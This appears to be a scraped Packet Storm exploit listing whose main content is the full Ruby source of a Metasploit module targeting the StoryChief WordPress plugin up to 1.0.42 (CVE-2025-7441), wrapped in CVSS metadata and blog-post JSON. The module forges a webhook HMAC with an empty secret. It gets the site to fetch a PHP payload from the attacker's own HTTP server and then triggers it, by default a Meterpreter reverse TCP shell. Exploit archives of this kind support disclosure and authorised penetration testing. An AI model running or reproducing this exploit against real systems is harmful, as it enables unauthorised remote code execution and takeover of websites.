{“lastseen”:”2026-02-19T16:58:26″,”description”:”This Metasploit module exploits an unauthenticated arbitrary file upload vulnerability in the StoryChief WordPress plugin less than or equal to 1.0.42. The plugin exposes a webhook endpoint at \/wp-json\/storychief\/webhook which accepts a forged HMAC…”,”published”:”2026-02-19T00:00:00″,”modified”:”2026-02-19T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 WordPress StoryChief 1.0.42 Shell Upload”,”source”:””,”references”:””,”id”:”PACKETSTORM:215915″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-7441″],”sourceData”:”##\\n # This module requires Metasploit: https:\/\/metasploit.com\/download\\n # Current source: https:\/\/github.com\/rapid7\/metasploit-framework\\n ##\\n \\n class MetasploitModule \\u003c Msf::Exploit::Remote\\n Rank = ExcellentRanking\\n \\n prepend Msf::Exploit::Remote::AutoCheck\\n include Msf::Exploit::FileDropper\\n include Msf::Exploit::Remote::HttpClient\\n include Msf::Exploit::Remote::HttpServer\\n include Msf::Exploit::Remote::HTTP::Wordpress\\n \\n def initialize(info = {})\\n super(\\n update_info(\\n info,\\n ‘Name’ =\\u003e ‘WordPress StoryChief Plugin Unauthenticated RCE’,\\n ‘Description’ =\\u003e %q{\\n This module exploits an unauthenticated arbitrary file upload\\n vulnerability in the StoryChief WordPress plugin \\u003c= 1.0.42.\\n \\n The plugin exposes a webhook endpoint at\\n \/wp-json\/storychief\/webhook which accepts a forged HMAC.\\n Because the plugin uses an empty secret for HMAC validation,\\n attackers can compute a valid MAC and force WordPress to\\n download and store attacker-controlled PHP content inside\\n the uploads directory, resulting in remote code execution.\\n },\\n ‘License’ =\\u003e MSF_LICENSE,\\n ‘Author’ =\\u003e [\\n ‘xpl0dec’, # Original PoC\\n ‘Nayera’ # Metasploit module\\n ],\\n ‘References’ =\\u003e [\\n [‘CVE’, ‘2025-7441’],\\n [‘EDB’, ‘52422’],\\n [‘URL’, ‘https:\/\/github.com\/Story-Chief\/wordpress’]\\n ],\\n ‘Platform’ =\\u003e [‘php’],\\n ‘Arch’ =\\u003e ARCH_PHP,\\n ‘Targets’ =\\u003e [\\n [‘Automatic Target’, {}]\\n ],\\n ‘DisclosureDate’ =\\u003e ‘2025-08-04’,\\n ‘DefaultTarget’ =\\u003e 0,\\n ‘DefaultOptions’ =\\u003e {\\n ‘PAYLOAD’ =\\u003e ‘php\/meterpreter\/reverse_tcp’,\\n ‘WfsDelay’ =\\u003e 15\\n },\\n ‘Privileged’ =\\u003e false,\\n ‘Stance’ =\\u003e Msf::Exploit::Stance::Aggressive,\\n ‘Notes’ =\\u003e {\\n ‘Stability’ =\\u003e [CRASH_SAFE],\\n ‘SideEffects’ =\\u003e [IOC_IN_LOGS, ARTIFACTS_ON_DISK],\\n ‘Reliability’ =\\u003e [REPEATABLE_SESSION]\\n }\\n )\\n )\\n \\n register_options([\\n OptString.new(‘TARGETURI’, [true, ‘Base path to WordPress’, ‘\/’])\\n ])\\n end\\n \\n #\\n # Check Method\\n #\\n def check\\n return CheckCode::Safe(‘WordPress not detected’) unless wordpress_and_online?\\n \\n res = send_request_cgi(\\n ‘method’ =\\u003e ‘GET’,\\n ‘uri’ =\\u003e normalize_uri(target_uri.path, ‘wp-json’, ‘storychief’)\\n )\\n \\n unless res \\u0026\\u0026 res.code == 200\\n return CheckCode::Safe(‘StoryChief REST namespace not found’)\\n end\\n \\n res = send_request_cgi(\\n ‘method’ =\\u003e ‘POST’,\\n ‘uri’ =\\u003e normalize_uri(target_uri.path, ‘wp-json’, ‘storychief’, ‘webhook’),\\n ‘ctype’ =\\u003e ‘application\/json’,\\n ‘data’ =\\u003e ‘{\\”meta\\”:{\\”mac\\”:\\”\\”,\\”event\\”:\\”publish\\”},\\”data\\”:{}}’\\n )\\n \\n return CheckCode::Unknown(‘No response from webhook endpoint’) unless res\\n \\n return CheckCode::Appears(‘StoryChief webhook endpoint reachable and likely vulnerable’) if res.code != 404\\n \\n CheckCode::Safe(‘Webhook endpoint returned 404. The plugin may not be installed, permalinks may not be configured, or the target is not vulnerable.’)\\n end\\n \\n #\\n # Serve malicious PHP payload\\n #\\n def on_request_uri(cli, _req)\\n print_good(\\”Serving malicious payload to #{cli.peerhost}\\”)\\n \\n php_payload = payload.encoded\\n \\n send_response(\\n cli,\\n php_payload,\\n ‘Content-Type’ =\\u003e ‘image\/jpeg’\\n )\\n \\n close_client(cli)\\n end\\n \\n #\\n # Generate JSON body + HMAC\\n #\\n def generate_signed_body(remote_url)\\n body_hash = {\\n ‘meta’ =\\u003e {\\n ‘event’ =\\u003e ‘publish’\\n },\\n ‘data’ =\\u003e {\\n ‘featured_image’ =\\u003e {\\n ‘data’ =\\u003e {\\n ‘sizes’ =\\u003e {\\n ‘full’ =\\u003e remote_url\\n }\\n }\\n }\\n }\\n }\\n \\n json_body = JSON.generate(body_hash).gsub(‘\/’, ‘\\\\\\\\\/’)\\n signature = OpenSSL::HMAC.hexdigest(‘sha256’, ”, json_body)\\n \\n body_hash[‘meta’][‘mac’] = signature\\n JSON.generate(body_hash)\\n end\\n \\n #\\n # Attempt to trigger uploaded shell\\n #\\n def trigger_shell(filename)\\n now = Time.now\\n \\n upload_path = normalize_uri(\\n target_uri.path,\\n ‘wp-content’,\\n ‘uploads’,\\n now.year.to_s,\\n format(‘%02d’, now.month),\\n filename\\n )\\n \\n print_status(\\”Attempting to execute uploaded payload at #{upload_path}\\”)\\n \\n res = send_request_cgi(\\n ‘method’ =\\u003e ‘GET’,\\n ‘uri’ =\\u003e upload_path\\n )\\n \\n unless res \\u0026\\u0026 res.code == 200\\n fail_with(Failure::UnexpectedReply, ‘Uploaded payload did not return HTTP 200, execution likely failed’)\\n end\\n end\\n \\n #\\n # Main Exploit\\n #\\n def exploit\\n payload_name = \\”#{Rex::Text.rand_text_alphanumeric(8..12)}.php\\”\\n register_file_for_cleanup(payload_name)\\n \\n print_status(‘Starting local HTTP server for payload hosting’)\\n \\n start_service(\\n ‘Uri’ =\\u003e {\\n ‘Path’ =\\u003e \\”\/#{payload_name}\\”,\\n ‘Proc’ =\\u003e proc { |cli, req| on_request_uri(cli, req) }\\n }\\n )\\n \\n payload_url = \\”#{get_uri.chomp(‘\/’)}\/#{payload_name}\\”\\n print_status(\\”Payload URL: #{payload_url}\\”)\\n \\n request_body = generate_signed_body(payload_url)\\n \\n print_status(‘Sending malicious webhook request’)\\n \\n res = send_request_cgi(\\n ‘method’ =\\u003e ‘POST’,\\n ‘uri’ =\\u003e normalize_uri(target_uri.path, ‘wp-json’, ‘storychief’, ‘webhook’),\\n ‘ctype’ =\\u003e ‘application\/json’,\\n ‘data’ =\\u003e request_body\\n )\\n \\n fail_with(Failure::Unreachable, ‘No response from target’) unless res\\n \\n unless res.code == 200 \\u0026\\u0026 res.body.include?(‘permalink’)\\n fail_with(Failure::UnexpectedReply, \\”Unexpected response (#{res.code})\\”)\\n end\\n \\n print_good(‘Webhook accepted payload \u2014 attempting execution’)\\n \\n trigger_shell(payload_name)\\n end\\n end”,”sourceHref”:”https:\/\/packetstorm.news\/download\/215915″,”cvss”:{“score”:9.8,”severity”:”CRITICAL”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:H\/I:H\/A:H”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/215915\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-02-19T16:58:26″,”description”:”This Metasploit module exploits an unauthenticated arbitrary file upload vulnerability in the StoryChief WordPress plugin less than or equal to 1.0.42. The plugin exposes a…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,35,12,13,53,7,11,5],"class_list":["post-41674","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-98","tag-exploit","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n